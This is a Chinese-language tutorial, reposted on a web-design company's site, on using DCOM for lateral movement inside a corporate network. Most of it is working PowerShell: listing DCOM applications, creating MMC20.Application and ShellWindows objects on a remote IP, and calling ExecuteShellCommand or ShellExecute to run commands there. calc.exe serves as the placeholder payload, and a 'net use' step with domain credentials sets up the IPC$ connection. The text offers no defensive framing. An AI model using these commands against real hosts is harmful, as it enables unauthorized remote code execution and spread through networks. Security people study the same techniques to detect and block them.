怎么使用dcom在内网中进行横向移动

本篇内容主要讲解“怎么使用dcom在内网中进行横向移动”，感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷，实用性强。下面就让小编来带大家学习“怎么使用dcom在内网中进行横向移动”吧!

创新互联建站是由多位在大型网络公司、广告设计公司的优秀设计人员和策划人员组成的一个具有丰富经验的团队，其中包括网站策划、网页美工、网站程序员、网页设计师、平面广告设计师、网络营销人员及形象策划。承接：成都网站建设、成都做网站、网站改版、网页设计制作、网站建设与维护、网络推广、数据库开发,以高性价比制作企业网站、行业门户平台等全方位的服务。

Dcom是微软的一系列概念和程序接口，通过dcom，客户端程序对象能够向网络中的另一台计算机上的服务器程序对象发起请求，今天讲讲如何通过dcom进行横向移动。

首先调用powershell

通过使用指令Get-CimInstance Win32_DCOMApplication来查看获取本地DCOM程序列表

由于Get-CimInstance这个cmdlet只存在于powershell的3.0版本中，所以执行该指令需要2020以上版本的操作系统才可以执行，当然，如果没有3.0版本也可以通过执行Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication来获取，两者效果是相同的。

1. 使用DCOM执行任意命令，适用于本地

1> $com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.101.102"))

2> $com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","minimized")

通过执行以上命令，会以当前会话执行Administrator权限的calc.exe

2. 在远程主机中执行命令

首先通过net use \\IP "password" /user:域\dm 建立ipc$连接

然后执行以下命令:

$com=[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","目标IP"))

$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","")

即可在远程计算机中执行calc.exe

3. 第二种方法

在远程主机中调用powershell，输入命令:

$com=[Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"192.168.101.102")

$obj = [System.Activator]::CreateInstance($com)

$item = $obj.item()

$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

执行calc.exe程序

到此，相信大家对“怎么使用dcom在内网中进行横向移动”有了更深的了解，不妨来实际操作一番吧！这里是创新互联网站，更多相关内容可以进入相关频道进行查询，关注我们，继续学习！

新闻名称：怎么使用dcom在内网中进行横向移动
链接地址：https://www.cdcxhl.com/article0/jeeeio.html

成都网站建设公司_创新互联，为您提供服务器托管、网站建设、营销型网站建设、响应式网站、定制网站、关键词优化

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联